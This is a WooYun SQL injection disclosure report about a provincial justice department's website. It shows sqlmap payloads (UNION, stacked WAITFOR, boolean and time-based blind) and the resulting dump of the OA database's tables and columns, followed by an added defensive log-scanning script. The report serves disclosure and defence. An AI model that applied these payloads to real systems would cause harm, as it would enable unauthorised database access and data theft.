
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0142681

Title: SQL injection vulnerability in a provincial Department of Justice information disclosure website

Related vendor: CNCERT (National Internet Emergency Center)

Author: Yang

Submitted: 2015-09-24 22:02

Fixed: 2015-11-12 19:18

Published: 2015-11-12 19:18

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 11

Status: Handed over to a third-party partner organisation (CNCERT National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-24: Details sent to the vendor, awaiting vendor handling
2015-09-28: CNCERT National Internet Emergency Center could not yet reach the responsible unit; details disclosed only to the notifying organisation
2015-10-08: Details disclosed to core white hats and domain experts
2015-10-18: Details disclosed to regular white hats
2015-10-28: Details disclosed to intern white hats
2015-11-12: Details disclosed to the public

Brief description:

The whole OA system is leaked.

Detailed description:

http://**.**.**.**/voteDisp.jsp?voteId=15
The voteId parameter is injectable.

(screenshot: 1.png)


sqlmap identified the following injection points with a total of 50 HTTP(s) requests:
---
Parameter: voteId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: voteId=15 AND 2576=2576
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: voteId=15 UNION ALL SELECT 24,CHAR(113)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(122)+CHAR(68)+CHAR(77)+CHAR(76)+CHAR(119)+CHAR(82)+CHAR(117)+CHAR(80)+CHAR(106)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113),24--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: voteId=15; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: voteId=15 WAITFOR DELAY '0:0:5'--
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] ahsft
[*] master
[*] model
[*] msdb
[*] tempdb
Database: ahsft
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| ezoffice.CMS_SITE_STATISTIC | 67432669 |
| ezoffice.CMS_ARTICLE_STATISTIC | 27499461 |
| ezoffice.CMS_CHANNEL_STATISTIC | 14555288 |
| ezoffice.CMS_OPERATION_LOG | 383292 |
| ezoffice.CMS_ARTICLE | 146852 |
| ezoffice.CMS_ARTI_CONTENT | 140478 |
| ezoffice.CMS_ARTI_OPERATION | 100274 |
| ezoffice.SFT_XXBS_SYXX | 98482 |
| ezoffice.SFT_XXBS_WDXX | 95361 |
| ezoffice.SECURITY_LOG | 58471 |
| dbo.BS_XMLFROMBEAN | 48079 |
| ezoffice.OA_ALLATTACH | 21779 |
| ezoffice.CMS_SYSTEM_LOG | 18070 |
| ezoffice.WF_PROCEEDREADWRITECONTROL | 17761 |
| ezoffice.CMS_ARTI_VERSION | 17757 |
| ezoffice.CMS_FILES | 14231 |
| ezoffice.OA_INFORMATIONBROWSER | 8461 |
| ezoffice.ORG_RIGHTSCOPE | 5972 |
| ezoffice.SFT_XXBS_KWXX | 5478 |
| ezoffice.ORG_SYNCRTX | 4999 |
| ezoffice.OA_INFORMATION | 3669 |
| ezoffice.CMS_MESSAGE | 3539 |
| ezoffice.CMS_MESSAGE_REPLY | 3450 |
| ezoffice.ORG_USER_ROLE | 2971 |
| ezoffice.ORG_EMPLOYEE | 2891 |
| ezoffice.ORG_ORGANIZATION_USER | 2887 |
| ezoffice.OA_DISTRICT | 2476 |
| ezoffice.WF_PROCEEDTRANSITION | 2366 |
| ezoffice.CMS_TMPL_CITATION | 2077 |
| ezoffice.WF_PROCEEDTR | 2060 |
| ezoffice.SFT_XXBS_DW | 1985 |
| ezoffice.roles | 1838 |
| ezoffice.CMS_VOTE_PERSON | 1562 |
| ezoffice.WF_PROCEEDACTIVITY | 1532 |
| ezoffice.CMS_MESSAGE_MASTER | 1446 |
| dbo.oldid | 1360 |
| ezoffice.CMS_TEMPLATES_FILES | 1213 |
| ezoffice.CMS_TMPL_FILE_OPERATION | 1203 |
| ezoffice.CMS_ARTI_CHANNEL | 978 |
| ezoffice.CMS_INTERVIEW_INFO | 793 |
| ezoffice.WF_DEALWITHLOG | 785 |
| ezoffice.CMS_CONFIG | 679 |
| ezoffice.SFT_XXBS_KW | 626 |
| ezoffice.WF_READWRITECONTROL | 619 |
| ezoffice.Document_File | 468 |
| ezoffice.Document | 466 |
| ezoffice.WF_WORK | 443 |
| ezoffice.OA_INFORORGSTAT | 438 |
| ezoffice.SECURITY_ONLINEUSER | 422 |
| ezoffice.OA_INFORPERSONALSTAT | 364 |
| ezoffice.wf_proceedflow | 321 |
| ezoffice.OA_INFORMATIONHISTORY | 319 |
| ezoffice.WF_DEALWITHCOMMENT | 286 |
| ezoffice.CMS_USERPOWER | 277 |
| ezoffice.WF_DEALWITH | 263 |
| ezoffice.ah_xxflbackup | 221 |
| ezoffice.OA_INFORMATIONACCESSORY | 221 |
| ezoffice.SFT_XXBS_XXCY | 210 |
| ezoffice.OA_MAIL_USER | 209 |
| ezoffice.WF_IMMOBILITYFIELD | 205 |
| ezoffice.ORG_ORGANIZATION | 187 |
| ezoffice.ORG_ROLE_RIGHT | 177 |
| ezoffice.CMS_SYNCH_OA_ARTICLE | 152 |
| ezoffice.CMS_QUES_PERSON | 140 |
| ezoffice.OA_MAILINTERIOR | 140 |
| ezoffice.CMS_AHSFT_SYNCHARTICLE_RECORD | 136 |
| ezoffice.OA_LINKMAN | 124 |
| ezoffice.ORG_RIGHT | 123 |
| ezoffice.SFT_XXBS_CXXX | 123 |
| ezoffice.CMS_PAGE | 105 |
| ezoffice.WF_TRANSITIONRESTRICTION | 100 |
| ezoffice.WF_TRANSITION | 96 |
| ezoffice.CMS_MODULE_OPERATION | 87 |
| dbo.aqsfj | 82 |
| dbo.hfsfj | 76 |
| ezoffice.Template_BookMarks | 74 |
| ezoffice.WF_ACTIVITY | 73 |
| ezoffice.CMS_INTERVIEW_GUEST | 72 |
| dbo.chuzsfj | 70 |
| dbo.fysfj | 70 |
| ezoffice.OA_INFORHISTORYACCESSORY | 67 |
| dbo.hssfj | 66 |
| dbo.xcsfj | 65 |
| dbo.szsfj | 59 |
| ezoffice.OA_ORGWRAP | 59 |
| ezoffice.ORG_ROLE | 59 |
| ezoffice.CMS_VOTE_ITEM | 58 |
| ezoffice.OA_CUSTMENU | 57 |
| ezoffice.OA_MENUSET | 57 |
| ezoffice.OA_INFORMATIONCHANNEL | 54 |
| dbo.czsfj | 48 |
| dbo.bbsfj | 47 |
| dbo.bzsfj | 47 |
| ezoffice.OA_FORUM | 46 |
| ezoffice.GOV_senddocumentTopical | 43 |
| dbo.chsfj | 42 |
| ezoffice.tShow | 40 |
| dbo.jb_message | 39 |
| dbo.whsfj | 39 |
| ezoffice.WF_WORKFLOWWRITECONTROL | 38 |
| dbo.Sheet1$ | 34 |
| ezoffice.CMS_ADVERT | 33 |
| ezoffice.SFT_XXBS_JFBZ | 31 |
| ezoffice.CMS_ADVERT_PLACE | 30 |
| ezoffice.OA_MAILACCESSORY | 30 |
| ezoffice.CMS_ARTI_LINKS | 26 |
| ezoffice.CUSTOMER_CENTER | 26 |
| dbo.cms_dxtj | 25 |
| ezoffice.SECURITY_LOG_MODULE | 25 |
| dbo.hbsfj | 24 |
| ezoffice.CMS_INFO_APPLY | 24 |
| ezoffice.CMS_QUES_ITEM | 24 |
| ezoffice.OA_PERSONALSTAT | 24 |
| ezoffice.OA_WORKLOG | 24 |
| ezoffice.OA_EVENTATTENDER | 23 |
| ezoffice.tElt | 23 |
| ezoffice.tField | 23 |
| ezoffice.WF_GRAPH_UNIT | 23 |
| ezoffice.oa_patchinfo | 22 |
| ezoffice.OA_DUTY | 20 |
| ezoffice.WF_PACKAGE | 20 |
| ezoffice.CMS_SITE | 19 |
| ezoffice.tSign | 19 |
| ezoffice.GOV_DOCUMENTSENDFILE | 18 |
| ezoffice.WF_NEEDFLOWMODULE | 18 |
| ezoffice.oa_boardroom_meetingtime | 17 |
| ezoffice.OA_BOARDROOMAPPLY | 17 |
| ezoffice.WF_IMMOBILITYFORM | 17 |
| ezoffice.CMS_ARTI_STATE | 16 |
| ezoffice.CMS_INTERVIEW | 15 |
| ezoffice.OA_DIARYCLASS | 15 |
| ezoffice.OA_EVENT | 15 |
| ezoffice.CMS_ROLE | 14 |
| ezoffice.OA_OFFICALDICTION | 14 |
| ezoffice.WF_WORKFLOWPROCESS | 14 |
| ezoffice.CMS_VOTE | 13 |
| ezoffice.gov_senddocumentword | 13 |
| ezoffice.MS_COUNT | 13 |
| ezoffice.CMS_ARTI_SOURCE | 12 |
| ezoffice.gov_senddocumentNum | 12 |
| ezoffice.OA_DIARY | 12 |
| ezoffice.Tmp | 12 |
| ezoffice.OA_INFORMATIONCOMMENT | 11 |
| ezoffice.GOV_senddocumentUpdate | 10 |
| ezoffice.GOV_SENDFILE_USER | 10 |
| ezoffice.OA_NETSURVEYVOTE | 10 |
| ezoffice.OA_SOUNDREMIND | 10 |
| ezoffice.CMS_TEMPLATES | 9 |
| ezoffice.OA_NOTEBOOK | 9 |
| ezoffice.tAreatype | 9 |
| ezoffice.Template_File | 9 |
| ezoffice.CMS_QUES_TOPIC | 8 |
| ezoffice.CMS_SYNCH_INFOPUBLIC_CHANNEL | 8 |
| ezoffice.CMS_SYNCH_OA_CHANNEL | 8 |
| ezoffice.MS_MODEL | 8 |
| ezoffice.OA_NETADDRESS | 8 |
| ezoffice.OA_NETADDRESSCLASS | 8 |
| ezoffice.SFT_XXBS_KWQS | 8 |
| ezoffice.CMS_MESSAGECATEGORY | 7 |
| ezoffice.CMS_MODULE | 7 |
| ezoffice.kill_kk | 7 |
| ezoffice.OA_BOARDROOM | 7 |
| ezoffice.SFT_XXBS_UNION | 7 |
| ezoffice.CMS_ARTI_KEYWORD | 6 |
| ezoffice.CMS_QUES_TEXT | 6 |
| ezoffice.GOV_SENDFILEBROWSER | 6 |
| ezoffice.GOV_SENDFILECHECKWITHWORKFLOW | 6 |
| ezoffice.OA_SOUNDSET | 6 |
| ezoffice.OA_WORKREPORTLEADER | 6 |
| ezoffice.OA_DEPARTMENTSTYLE | 5 |
| ezoffice.OA_LINKMANCLASS | 5 |
| ezoffice.OA_WORKREPORT | 5 |
| ezoffice.ORG_USER_GROUP | 5 |
| ezoffice.CMS_QUESTIONNAIRE | 4 |
| ezoffice.OA_BDROOMAPPACCESSORY | 4 |
| ezoffice.OA_FORUMCLASS | 4 |
| ezoffice.OA_MAILUSERBOX | 4 |
| ezoffice.oa_maturity_alert_settings | 4 |
| ezoffice.OA_NETSURVEYITEM | 4 |
| ezoffice.tType | 4 |
| dbo.BookMarks | 3 |
| ezoffice.ah_roles | 3 |
| ezoffice.ah_xxcheck | 3 |
| ezoffice.CMS_VERSION | 3 |
| ezoffice.OA_ASSOCIATEINFO | 3 |
| ezoffice.OA_BDROOMAPPTYPE | 3 |
| ezoffice.OA_EDITION | 3 |
| ezoffice.OA_TASK | 3 |
| ezoffice.OA_TASKEXEC | 3 |
| ezoffice.tModel | 3 |
| ezoffice.tSession | 3 |
| ezoffice.ah_xxdh | 2 |
| ezoffice.CMS_IP_LIMIT | 2 |
| ezoffice.CMS_IPS | 2 |
| ezoffice.GOV_RECEIVEFILE | 2 |
| ezoffice.GOV_senddocumentBASEINFO | 2 |
| ezoffice.MS_INFODESCRIBE | 2 |
| ezoffice.OA_NETDISK_FILE | 2 |
| ezoffice.OA_RELATIONOBJECT | 2 |
| ezoffice.OA_WORKREPORTPOSTIL | 2 |
| ezoffice.tArea | 2 |
| ezoffice.tCode | 2 |
| ezoffice.tSeq | 2 |
| ezoffice.tTable | 2 |
| ezoffice.ah_fwl | 1 |
| ezoffice.CMS_APPLYFLOW_INFO | 1 |
| ezoffice.CMS_ARTI_CHANNEL_SQL | 1 |
| ezoffice.CMS_ARTI_TYPE | 1 |
| ezoffice.CMS_SEQ | 1 |
| ezoffice.D99_REG | 1 |
| ezoffice.Document_Signature | 1 |
| ezoffice.foofoofoo | 1 |
| ezoffice.GJ_GOODS | 1 |
| ezoffice.GJ_GOODSTYPE | 1 |
| ezoffice.GJ_STOCK | 1 |
| ezoffice.GJ_STOCK_GOODSTYPE | 1 |
| ezoffice.GOV_documentUnit | 1 |
| ezoffice.gov_ReceiveFileSeq | 1 |
| ezoffice.gov_senddocumentseq | 1 |
| ezoffice.GOV_SENDFILENOBROWSER | 1 |
| ezoffice.gov_wflowResave | 1 |
| ezoffice.OA_ARCHIVESCLASS | 1 |
| ezoffice.OA_ARCHIVESDOSSIER | 1 |
| ezoffice.OA_CUSTOMDESKTOPLAYOUT | 1 |
| ezoffice.OA_FESTIVALSET | 1 |
| ezoffice.OA_NETSURVEY | 1 |
| ezoffice.OA_SEQ | 1 |
| ezoffice.OA_UNITINFO | 1 |
| ezoffice.ORG_DOMAIN | 1 |
| ezoffice.ORG_GROUP | 1 |
| ezoffice.ORG_MANAGER | 1 |
| ezoffice.SECURITY_IP | 1 |
| ezoffice.TABLERELATION | 1 |
| ezoffice.tLimit | 1 |
| ezoffice.tPage | 1 |
| ezoffice.WF_WORKFLOWCHANNEL | 1 |
| ezoffice.WF_WORKFLOWSTOCK | 1 |
+----------------------------------------+---------+
Database: ahsft
Table: ezoffice.CMS_SITE_STATISTIC
[5 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| INTERVIEW_DATE | datetime |
| INTERVIEW_IP | varchar |
| SITE_ID | numeric |
| STATISTIC_ID | numeric |
| STATISTIC_TYPE | numeric |
+----------------+----------+
Database: ahsft
Table: ezoffice.CMS_ARTICLE
[41 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| ARTI_ACCESSORY_IDS | varchar |
| ARTI_AUTHOR | varchar |
| ARTI_CODE | varchar |
| ARTI_CREATED_TIME | datetime |
| ARTI_CREATOR_ID | varchar |
| ARTI_CREATOR_ORGID | varchar |
| ARTI_DELETEFLAG | numeric |
| ARTI_EDIT_TIME | datetime |
| ARTI_EDITOR | varchar |
| ARTI_END_TIME | datetime |
| ARTI_FWWH | varchar |
| ARTI_KEYWORD | varchar |
| ARTI_LINK | varchar |
| ARTI_LINK_IDS | varchar |
| ARTI_MAPPING | numeric |
| ARTI_PHOTO_IDS | varchar |
| ARTI_PRESENTATION | varchar |
| ARTI_RELA_ARTICLE | numeric |
| ARTI_RELA_ARTICLE_ID | varchar |
| ARTI_RELA_ARTICLE_SQL | varchar |
| ARTI_SHORTTITLE | varchar |
| ARTI_SHORTTITLE_STYLE | varchar |
| ARTI_SOURCE | varchar |
| ARTI_START_TIME | datetime |
| ARTI_SYMBOL_PHOTO_IDS | varchar |
| ARTI_TITLE | varchar |
| ARTI_VERSION | varchar |
| ARTICLE_ID | numeric |
| ARTICLE_MAPPING_ID | numeric |
| ARTICLE_STATE_ID | numeric |
| ARTICLE_TYPE_ID | numeric |
| CHANNEL_ID | numeric |
| DOMAIN_ID | numeric |
| LOOK_CNT | numeric |
| NEEDTIME_CTRL | numeric |
| RECOMMEND_FLAG | numeric |
| SETTOP_FLAG | numeric |
| SITE_ID | numeric |
| STR1 | varchar |
| STR2 | varchar |
| STR3 | varchar |
+-----------------------+----------+
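As an added defender's example (not code from the report or the affected product), the Python scanner below runs over constructed access-log lines and flags the four payload shapes sqlmap reported against voteId, and it also rejects any voteId that is not a plain integer, which is the whitelist check the vulnerable page lacks. The log lines, IP address and timestamps are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# One signature per sqlmap technique the report lists for voteId: stacked
# WAITFOR, bare WAITFOR (time-based), UNION SELECT, boolean tautology.
SIGNATURES = [
    ("stacked-query", re.compile(r";\s*waitfor\s+delay", re.I)),
    ("time-based-blind", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("union-query", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("boolean-based-blind", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
]

def is_well_formed_vote_id(value):
    """Whitelist check: voteId must be a plain integer of up to 10 digits."""
    return re.fullmatch(r"\d{1,10}", value) is not None

def classify_request(request_path):
    """Return (parameter, technique) for a suspicious query string, else None.
    parse_qs URL-decodes values; the voteId integer check catches the rest."""
    query = urlsplit(request_path).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            for label, pattern in SIGNATURES:
                if pattern.search(value):
                    return name, label
            if name == "voteId" and not is_well_formed_vote_id(value):
                return name, "malformed-voteId"
    return None

LOG_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def scan_log(text):
    """Return [(line_number, parameter, technique)] for every flagged line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.search(line)
        verdict = classify_request(m.group(1)) if m else None
        if verdict:
            hits.append((lineno,) + verdict)
    return hits

# Constructed access-log lines (not from the report); payload shapes mirror sqlmap's.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Sep/2015:22:01:10 +0800] "GET /voteDisp.jsp?voteId=15 HTTP/1.1" 200 5120
10.0.0.5 - - [24/Sep/2015:22:01:11 +0800] "GET /voteDisp.jsp?voteId=15%20AND%202576%3D2576 HTTP/1.1" 200 5120
10.0.0.5 - - [24/Sep/2015:22:01:12 +0800] "GET /voteDisp.jsp?voteId=15%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- HTTP/1.1" 200 5120
10.0.0.5 - - [24/Sep/2015:22:01:13 +0800] "GET /voteDisp.jsp?voteId=15%20UNION%20ALL%20SELECT%2024%2CNULL%2C24-- HTTP/1.1" 200 7300
10.0.0.5 - - [24/Sep/2015:22:01:14 +0800] "GET /voteDisp.jsp?voteId=15%27 HTTP/1.1" 500 410
"""
```

Calling scan_log(SAMPLE_LOG) flags lines 2 to 5 and leaves the legitimate first request alone; the same is_well_formed_vote_id check belongs in the JSP before the value reaches any query.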


Proof of vulnerability:

After running a lot of queries the site becomes unreachable; there is probably a firewall. ezoffice is Wanhu Network's collaborative office (OA) software product, which for many years has concentrated on the mid-to-high-end market.
All the data inside the OA is leaked, la la la.
Nothing was touched; please don't come knocking on my door.

Fix recommendation:

It's Mid-Autumn Festival... the mooncakes I redeem won't take until after New Year to arrive, will they?

Copyright notice: when reposting, please credit the source: Yang@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 11

Confirmed: 2015-09-28 19:16

Vendor reply:

CNVD confirmed and reproduced the described situation; it has been forwarded through CNCERT to the Anhui branch center, which will coordinate handling with the unit that administers the website.

Latest status:

None yet